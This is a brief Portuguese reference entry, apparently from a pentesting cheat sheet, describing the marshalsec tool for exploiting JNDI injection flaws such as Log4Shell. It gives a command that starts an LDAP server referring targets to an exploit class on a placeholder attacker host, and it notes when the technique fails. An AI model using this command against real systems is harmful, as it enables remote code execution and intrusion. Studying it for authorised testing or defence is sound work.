marshalsec (JNDI/LDAP)

java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<attacker>/#Exploit"

Servidor LDAP/RMI para explorar vulnerabilidades JNDI (ex. Log4j) com referências a código malicioso.

Quando você encontra uma vulnerabilidade de injeção JNDI, como Log4Shell (CVE-2021-44228) ou em aplicações Java que usam JNDI com parâmetros controláveis. Marshalsec levanta um servidor LDAP que retorna uma referência a um objeto remoto (classe Java) que pode executar código. É a forma padrão de explorar JNDI.

Se o alvo tem JNDI corrigido ou usa filtros de desserialização. Também se você não tem um servidor HTTP para hospedar a classe exploit.